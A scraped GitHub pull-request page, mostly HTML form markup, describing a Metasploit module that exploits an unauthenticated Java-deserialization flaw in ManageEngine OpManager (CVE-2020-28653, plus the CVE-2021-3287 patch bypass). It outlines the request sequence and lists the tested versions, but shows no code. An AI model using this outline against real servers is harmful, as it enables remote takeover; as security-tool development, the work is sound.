        <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
      </svg>
    </p>
    <p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
      <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
        <path fill-rule="evenodd"
          d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
        </path>
      </svg> Sorry, something went wrong.
    </p>
  </include-fragment>
</form>

POST /rapid7/metasploit-framework/pull/15670/review_comment/710149942

<form class="js-comment-update" data-type="json" action="/rapid7/metasploit-framework/pull/15670/review_comment/710149942" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden"
    name="authenticity_token" value="wGYUIPcRPXk40zIw5+W59jKyd2D5cmTN3VIN52WLUziQ49hz56gNizWEURLka/107J9OP8694qCldfgod34g7g==" autocomplete="off">
  <include-fragment loading="lazy" src="/rapid7/metasploit-framework/pull/15670/review_comment/710149942/edit_form?textarea_id=discussion_r710149942-body&amp;comment_context=discussion"
    class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
    <p class="text-center mt-3" data-hide-on-error="">
      <svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
        <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
        <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
      </svg>
    </p>
    <p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
      <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
        <path fill-rule="evenodd"
          d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
        </path>
      </svg> Sorry, something went wrong.
    </p>
  </include-fragment>
</form>

POST /rapid7/metasploit-framework/reactions

<form class="js-pick-reaction" action="/rapid7/metasploit-framework/reactions" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden" name="authenticity_token"
    value="1N/9Lwvy3QmNrIRtfa97uru+jhDanCTx91uRQ7ZR8IsB78Hdx0AzrS3fMcqTmmEZXxTWMwbxXfqhUFNM7JyFCg==" autocomplete="off">
  <input type="hidden" name="input[subjectId]" value="PRRC_kwDOACL9ps4qVAc2">
  <div class="comment-reactions-options js-comment-reactions-options">
    <button disabled="" class="
    btn-link
    tooltipped
    tooltipped-multiline
    d-flex
    flex-items-baseline
    social-reaction-summary-item
      color-text-secondary
    reaction-summary-item js-reaction-group-button js-optimistic-reaction-render-button tooltipped-s" style="border-radius:100px;font-size:12px;" name="input[content]" type="submit" value="THUMBS_UP react"
      aria-label="wvu-r7 reacted with thumbs up emoji" data-button-index-position="1" data-reaction-content="+1">
      <g-emoji alias="+1" fallback-src="https://github.githubassets.com/images/icons/emoji/unicode/1f44d.png" class="social-button-emoji">👍</g-emoji>
      <span class="js-discussion-reaction-group-count">1</span>
    </button>
  </div>
</form>

POST /rapid7/metasploit-framework/issue_comments/922109879

<form class="js-comment-update" id="issuecomment-922109879-edit-form" action="/rapid7/metasploit-framework/issue_comments/922109879" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
    type="hidden" data-csrf="true" name="authenticity_token" value="FA6PyMsvuXAiVZ+qKPDisWWhs42DCooY4zA2HkwbgOYLkDYk5oGpw/a/f/TLr/bfiIfbpqWYxjobxKuIHgXwcA==">
  <include-fragment loading="lazy" src="/rapid7/metasploit-framework/issue_comments/922109879/edit_form?textarea_id=issuecomment-922109879-body&amp;comment_context=" class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
    <p class="text-center mt-3" data-hide-on-error="">
      <svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
        <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
        <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
      </svg>
    </p>
    <p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
      <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
        <path fill-rule="evenodd"
          d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
        </path>
      </svg> Sorry, something went wrong.
    </p>
  </include-fragment>
</form>

POST /rapid7/metasploit-framework/pull/15670/review_comment/711378773

<form class="js-comment-update" data-type="json" action="/rapid7/metasploit-framework/pull/15670/review_comment/711378773" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden"
    name="authenticity_token" value="Ilt/QfMPbF2Jnpzceiojq7G5skDmIhQK9EmDnsI3zYLg96+j5W/KhtQ1Y4Y4oqmABMbpO4Hpz8PpCJbQ1qvrsg==" autocomplete="off">
  <include-fragment loading="lazy" src="/rapid7/metasploit-framework/pull/15670/review_comment/711378773/edit_form?textarea_id=discussion_r711378773-body&amp;comment_context=discussion"
    class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
    <p class="text-center mt-3" data-hide-on-error="">
      <svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
        <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
        <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
      </svg>
    </p>
    <p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
      <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
        <path fill-rule="evenodd"
          d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
        </path>
      </svg> Sorry, something went wrong.
    </p>
  </include-fragment>
</form>

POST /rapid7/metasploit-framework/reactions

<form class="js-pick-reaction" action="/rapid7/metasploit-framework/reactions" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden" name="authenticity_token"
    value="0HP03SW5HTXY0Psd+HP5reJSW7OYszuJc/+g+BqwY14FQ8gv6QvzkXijTroWRuMOBvgDkETeQoIl9GL3QH0W3w==" autocomplete="off">
  <input type="hidden" name="input[subjectId]" value="PRRC_kwDOACL9ps4qZsdV">
  <div class="comment-reactions-options js-comment-reactions-options">
  </div>
</form>

POST /rapid7/metasploit-framework/reactions

<form class="js-pick-reaction" action="/rapid7/metasploit-framework/reactions" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden" data-csrf="true" name="authenticity_token"
    value="iWac3MVeXE4m7kMq/pyj+l0StwUHQM2yyBA0/KbwQ3yWc0fJxsPVvs2UnnXBpup/2TtSyjtI3LL+NyHuj3+6BA==">
  <input type="hidden" name="input[subjectId]" value="IC_kwDOACL9ps42_OKy">
  <div class="comment-reactions-options">
    <button disabled="" class="
    btn-link
    tooltipped
    tooltipped-multiline
    d-flex
    flex-items-baseline
    social-reaction-summary-item
      color-text-secondary
    reaction-summary-item tooltipped-se" style="border-radius:100px;font-size:12px;" name="input[content]" type="submit" value="THUMBS_UP react" aria-label="space-r7 reacted with thumbs up emoji" data-button-index-position="0"
      data-reaction-content="+1">
      <g-emoji alias="thumbs up" fallback-src="https://github.githubassets.com/images/icons/emoji/unicode/1f44d.png" class="social-button-emoji">👍</g-emoji>
      <span>1</span>
    </button>
  </div>
</form>

POST /rapid7/metasploit-framework/issue_comments/922542770

<form class="js-comment-update" id="issuecomment-922542770-edit-form" action="/rapid7/metasploit-framework/issue_comments/922542770" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
    type="hidden" data-csrf="true" name="authenticity_token" value="bVdXHpNfYPTkR6JKZO4WhvDWOW9jiXoxGiFfwFSjx0h3VezPlLG/J+5GSrjlHGlbwwQv/GILhsUIo5xRC0u7Yg==">
  <include-fragment loading="lazy" src="/rapid7/metasploit-framework/issue_comments/922542770/edit_form?textarea_id=issuecomment-922542770-body&amp;comment_context=" class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
    <p class="text-center mt-3" data-hide-on-error="">
      <svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
        <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
        <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
      </svg>
    </p>
    <p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
      <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
        <path fill-rule="evenodd"
          d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
        </path>
      </svg> Sorry, something went wrong.
    </p>
  </include-fragment>
</form>

POST /rapid7/metasploit-framework/issue_comments/922959000

<form class="js-comment-update" id="issuecomment-922959000-edit-form" action="/rapid7/metasploit-framework/issue_comments/922959000" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
    type="hidden" data-csrf="true" name="authenticity_token" value="z6PDwdDAPPBNLTQNSzBfBxOhe8raj98wMpKHJ3hYYIa/t/nzyy+ftFCHLGrpXVaX0XCOcAIQluG+SCC+tFvIvw==">
  <include-fragment loading="lazy" src="/rapid7/metasploit-framework/issue_comments/922959000/edit_form?textarea_id=issuecomment-922959000-body&amp;comment_context=" class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
    <p class="text-center mt-3" data-hide-on-error="">
      <svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
        <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
        <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
      </svg>
    </p>
    <p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
      <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
        <path fill-rule="evenodd"
          d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
        </path>
      </svg> Sorry, something went wrong.
    </p>
  </include-fragment>
</form>

POST /rapid7/metasploit-framework/issue_comments/923124023

<form class="js-comment-update" id="issuecomment-923124023-edit-form" action="/rapid7/metasploit-framework/issue_comments/923124023" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
    type="hidden" data-csrf="true" name="authenticity_token" value="ZBWoxEhMPd9zt/q6YKW+jk/4Lnv6ri4wGF+tJQa4x4qHd/Lu1mLs5bV5pjh7tmQWNOLGIWcI3J03PM/JSkMVyw==">
  <include-fragment loading="lazy" src="/rapid7/metasploit-framework/issue_comments/923124023/edit_form?textarea_id=issuecomment-923124023-body&amp;comment_context=" class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
    <p class="text-center mt-3" data-hide-on-error="">
      <svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
        <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
        <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
      </svg>
    </p>
    <p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
      <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
        <path fill-rule="evenodd"
          d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
        </path>
      </svg> Sorry, something went wrong.
    </p>
  </include-fragment>
</form>

POST /rapid7/metasploit-framework/issue_comments/923125198

<form class="js-comment-update" id="issuecomment-923125198-edit-form" action="/rapid7/metasploit-framework/issue_comments/923125198" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
    type="hidden" data-csrf="true" name="authenticity_token" value="78ooDJCyeYyrO84EkoTo9GU/DDrI7zR8j6hDc9sH//yy5EMGAiA58aBzd/SNTRyEl41CWUHag85wMcSAOp760A==">
  <include-fragment loading="lazy" src="/rapid7/metasploit-framework/issue_comments/923125198/edit_form?textarea_id=issuecomment-923125198-body&amp;comment_context=" class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
    <p class="text-center mt-3" data-hide-on-error="">
      <svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
        <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
        <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
      </svg>
    </p>
    <p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
      <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
        <path fill-rule="evenodd"
          d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
        </path>
      </svg> Sorry, something went wrong.
    </p>
  </include-fragment>
</form>

POST /_graphql/MarkNotificationSubjectAsRead

<form class="d-none js-timeline-marker-form" action="/_graphql/MarkNotificationSubjectAsRead" accept-charset="UTF-8" data-remote="true" method="post"><input type="hidden" data-csrf="true" name="authenticity_token"
    value="fVgalpe+BinSDYC9Sb0UQU/zs+M5ih1/WyZBvv7AxFm1TMVYge0p2DFb0iGicWV2e5A1tZ/mP5peIYEtoR40qQ==">
  <input type="hidden" name="variables[subjectId]" value="MDExOlB1bGxSZXF1ZXN0NzMzMTUyNjA4">
</form>

POST /rapid7/metasploit-framework/pull/15670/review-requests

<form class="js-issue-sidebar-form" aria-label="Select reviewers" data-reviewers-team-size-check-url="/rapid7/metasploit-framework/pull/15670/review-requests/team-size-check" action="/rapid7/metasploit-framework/pull/15670/review-requests"
  accept-charset="UTF-8" method="post"><input type="hidden" data-csrf="true" name="authenticity_token" value="zD1qwUWv6ekwetZrh0bfoEu9B/0bkF4KDezD9TM9uWNkBZXW/rLSzWzGsk6LFFCfaO6f1CcJrBoYMHNzPxtHdA==">
  <div class="js-large-teams-check-warning-container"></div>
  <div class="discussion-sidebar-heading text-bold"> Reviewers </div>
  <span class="css-truncate">
    <p class="d-flex">
      <span class="d-flex min-width-0 flex-1 js-hovercard-left" data-hovercard-type="user" data-hovercard-url="/users/space-r7/hovercard" data-assignee-name="space-r7">
        <a class="no-underline" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/space-r7">
    <img class="avatar mr-1 avatar-user" src="https://avatars.githubusercontent.com/u/40177151?s=40&amp;v=4" width="20" height="20" alt="@space-r7">
</a> <a class="assignee Link--primary css-truncate-target width-fit" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/space-r7">
    <span class="css-truncate-target width-fit v-align-middle">space-r7</span>
</a></span>
      <a class="flex-order-1" href="/rapid7/metasploit-framework/pull/15670/files/4bccc0541fca74c126930f5e4e0b0a93f5d56652">
            <span class="reviewers-status-icon tooltipped tooltipped-nw float-right d-block text-center" aria-label="space-r7 left review comments">
              <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-comment color-icon-secondary">
    <path fill-rule="evenodd" d="M2.75 2.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h2a.75.75 0 01.75.75v2.19l2.72-2.72a.75.75 0 01.53-.22h4.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25H2.75zM1 2.75C1 1.784 1.784 1 2.75 1h10.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0113.25 12H9.06l-2.573 2.573A1.457 1.457 0 014 13.543V12H2.75A1.75 1.75 0 011 10.25v-7.5z"></path>
</svg>
            </span>
          </a>
    </p>
    <p class="d-flex">
      <span class="d-flex min-width-0 flex-1 js-hovercard-left" data-hovercard-type="user" data-hovercard-url="/users/smcintyre-r7/hovercard" data-assignee-name="smcintyre-r7">
        <a class="no-underline" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/smcintyre-r7">
    <img class="avatar mr-1 avatar-user" src="https://avatars.githubusercontent.com/u/58950994?s=40&amp;v=4" width="20" height="20" alt="@smcintyre-r7">
</a> <a class="assignee Link--primary css-truncate-target width-fit" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/smcintyre-r7">
    <span class="css-truncate-target width-fit v-align-middle">smcintyre-r7</span>
</a></span>
      <a class="flex-order-1" href="/rapid7/metasploit-framework/pull/15670/files/fb74888a3196e411e08cfc29f3bd9bc94001c8c9">
            <span class="reviewers-status-icon tooltipped tooltipped-nw float-right d-block text-center" aria-label="smcintyre-r7 left review comments">
              <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-comment color-icon-secondary">
    <path fill-rule="evenodd" d="M2.75 2.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h2a.75.75 0 01.75.75v2.19l2.72-2.72a.75.75 0 01.53-.22h4.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25H2.75zM1 2.75C1 1.784 1.784 1 2.75 1h10.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0113.25 12H9.06l-2.573 2.573A1.457 1.457 0 014 13.543V12H2.75A1.75 1.75 0 011 10.25v-7.5z"></path>
</svg>
            </span>
          </a>
    </p>
    <p class="d-flex">
      <span class="d-flex min-width-0 flex-1 js-hovercard-left" data-hovercard-type="user" data-hovercard-url="/users/adfoster-r7/hovercard" data-assignee-name="adfoster-r7">
        <a class="no-underline" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/adfoster-r7">
    <img class="avatar mr-1 avatar-user" src="https://avatars.githubusercontent.com/u/60357436?s=40&amp;v=4" width="20" height="20" alt="@adfoster-r7">
</a> <a class="assignee Link--primary css-truncate-target width-fit" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/adfoster-r7">
    <span class="css-truncate-target width-fit v-align-middle">adfoster-r7</span>
</a></span>
      <a class="flex-order-1" href="/rapid7/metasploit-framework/pull/15670/files/4b360f9958884758d7aaddcb7f02e0a73e2cf6d8">
            <span class="reviewers-status-icon tooltipped tooltipped-nw float-right d-block text-center" aria-label="adfoster-r7 left review comments">
              <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-comment color-icon-secondary">
    <path fill-rule="evenodd" d="M2.75 2.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h2a.75.75 0 01.75.75v2.19l2.72-2.72a.75.75 0 01.53-.22h4.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25H2.75zM1 2.75C1 1.784 1.784 1 2.75 1h10.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0113.25 12H9.06l-2.573 2.573A1.457 1.457 0 014 13.543V12H2.75A1.75 1.75 0 011 10.25v-7.5z"></path>
</svg>
            </span>
          </a>
    </p>
  </span>
</form>

POST /rapid7/metasploit-framework/issues/15670/assignees

<form class="js-issue-sidebar-form" aria-label="Select assignees" action="/rapid7/metasploit-framework/issues/15670/assignees" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
    type="hidden" data-csrf="true" name="authenticity_token" value="zchOcIeUwFHdJ1PfV3iRbSeHdsrG/XBiM5nRZkqZahU+gkRbB4PpDA9N7kX3Uv/CxFaDKK38fNQHiisnX4ALUQ==">
  <div class="discussion-sidebar-heading text-bold"> Assignees </div>
  <span class="css-truncate js-issue-assignees">
    <p>
      <span class="d-flex min-width-0 flex-1 js-hovercard-left" data-hovercard-type="user" data-hovercard-url="/users/space-r7/hovercard" data-assignee-name="space-r7">
        <a class="no-underline" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/space-r7">
    <img class="avatar mr-1 avatar-user" src="https://avatars.githubusercontent.com/u/40177151?s=40&amp;v=4" width="20" height="20" alt="@space-r7">
</a> <a class="assignee Link--primary css-truncate-target width-fit" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/space-r7">
    <span class="css-truncate-target width-fit v-align-middle">space-r7</span>
</a> <span class="reviewers-status-icon v-hidden" aria-hidden="true"></span>
      </span>
    </p>
  </span>
</form>

POST /rapid7/metasploit-framework/projects/issues/15670

<form class="js-issue-sidebar-form" aria-label="Select projects" action="/rapid7/metasploit-framework/projects/issues/15670" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden"
    data-csrf="true" name="authenticity_token" value="OZL8DgDpkOfKyE23hLS3kNo1363bvBvbqP/G8ftDaKEAjKa+RYoJkiFpiQKRralGWmLMPkGYi/pxzyZ2bhJBSw==">
  <div class="discussion-sidebar-heading text-bold"> Projects </div>
  <span class="css-truncate sidebar-progress-bar"> None yet </span>
</form>

POST /rapid7/metasploit-framework/issues/15670/set_milestone?partial=issues%2Fsidebar%2Fshow%2Fmilestone

<form class="js-issue-sidebar-form" aria-label="Select milestones" action="/rapid7/metasploit-framework/issues/15670/set_milestone?partial=issues%2Fsidebar%2Fshow%2Fmilestone" accept-charset="UTF-8" method="post"><input type="hidden" name="_method"
    value="put" autocomplete="off"><input type="hidden" data-csrf="true" name="authenticity_token" value="3fzbjcuZapSFJPClRWqoXVOr5idhrMWBKae1j3Yarg1A/5zdIvRCj/JEAptd8Q+PcAmAUwVUeupNmvEdFVUbsw==">
  <div class="discussion-sidebar-heading text-bold"> Milestone </div> No milestone
</form>

POST /rapid7/metasploit-framework/issues/closing_references?source_id=733152608&source_type=PULL_REQUEST

<form class="js-issue-sidebar-form" aria-label="Link issues" action="/rapid7/metasploit-framework/issues/closing_references?source_id=733152608&amp;source_type=PULL_REQUEST" accept-charset="UTF-8" method="post"><input type="hidden" name="_method"
    value="put" autocomplete="off"><input type="hidden" data-csrf="true" name="authenticity_token" value="feQt4yo30cOjcP+13dMhDlFeXNsoVh89lHS85sSmhOTtgkRF4L2zLJjjMVE7Qb3wwyQjyOWQOce0ro8yo/rbig==">
  <div class="discussion-sidebar-heading text-bold"> Linked issues </div>
  <p>Successfully merging this pull request may close these issues.</p>
  <p>None yet</p>
</form>

Text Content

Skip to content
Sign up
 * Why GitHub?
   Features →
    * Mobile →
    * Actions →
    * Codespaces →
    * Packages →
    * Security →
    * Code review →
    * Issues →
    * Integrations →
   
    * GitHub Sponsors →
    * Customer stories→

 * Team
 * Enterprise
 * Explore
    * Explore GitHub →
   
   LEARN AND CONTRIBUTE
   
    * Topics →
    * Collections →
    * Trending →
    * Learning Lab →
    * Open source guides →
   
   CONNECT WITH OTHERS
   
    * The ReadME Project →
    * Events →
    * Community forum →
    * GitHub Education →
    * GitHub Stars program →

 * Marketplace
 * Pricing
   Plans →
    * Compare plans →
    * Contact Sales →
   
    * Education →

 * In this repository All GitHub ↵
   Jump to ↵

 * No suggested jump to results

 * In this repository All GitHub ↵
   Jump to ↵
 * In this organization All GitHub ↵
   Jump to ↵
 * In this repository All GitHub ↵
   Jump to ↵

Sign in
Sign up

{{ message }}


RAPID7 / METASPLOIT-FRAMEWORK PUBLIC

 * Notifications
 * Star 25.3k
 * Fork 11.6k


 * Code
 * Issues 468
 * Pull requests 26
 * Discussions
 * Actions
 * Projects 2
 * Wiki
 * Security
 * Insights

More
 * Code
 * Issues
 * Pull requests
 * Discussions
 * Actions
 * Projects
 * Wiki
 * Security
 * Insights

New issue

Have a question about this project? Sign up for a free GitHub account to open an
issue and contact its maintainers and the community.

Pick a username Email Address Password Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy
statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom


ADD EXPLOIT FOR CVE-2020-28653 (MANAGEENGINE OPMANAGER RCE) #15670

Merged
space-r7 merged 12 commits into rapid7:master from
zeroSteiner:feat/cve-2021-3287 16 days ago

Merged


ADD EXPLOIT FOR CVE-2020-28653 (MANAGEENGINE OPMANAGER RCE) #15670

space-r7 merged 12 commits into rapid7:master from
zeroSteiner:feat/cve-2021-3287 16 days ago

+502 −92
Conversation 12 Commits 12 Checks 18 Files changed 7


CONVERSATION

Copy link
Contributor


ZEROSTEINER COMMENTED 23 DAYS AGO •
EDITED

This adds an exploit for CVE-2020-28653 which is an unauthenticated RCE in
Manage Engine's OpManager platform. The vulnerability is a Java deserialization
flaw in the Smart Update Manager. The exploit itself is pretty straightforward,
2 HTTP requests are made before the serialized Java blob is sent to the server
to trigger the vulnerability. The first sets up an HTTP session by obtaining a
session cookie, the second puts the established HTTP session in an exploitable
state. CVE-2021-3287 is a patch bypass for CVE-2020-28653 which is also
supported by this module.

Tested:

 * OpManager 12.5.232 on Ubuntu
 * OpManager-Central 12.5.328 on Windows Server 2019
 * OpManager 12.5.174 on Windows Server 2019
 * OpManager 12.3.295 on Windows Server 2019
 * OpManager 12.3.238 on Windows Server 2019
 * OpManager 12.3.204 on Windows Server 2019 (fails because the gadget chain is
   incompatible)
 * NetFlow 12.5.008 on Windows Server 2019

The Msf::Exploit::JavaDeserialization mixin can't be used for this exploit
because the YSoSerial payload isn't available in the modified version which has
the shell-specific variants. Each target was tested to ensure that the module is
setting the shell and escaping the arguments as necessary.


JAVA DESERIALIZATION UPDATES

This PR makes some updates to the tooling around the YSoSerial payloads.

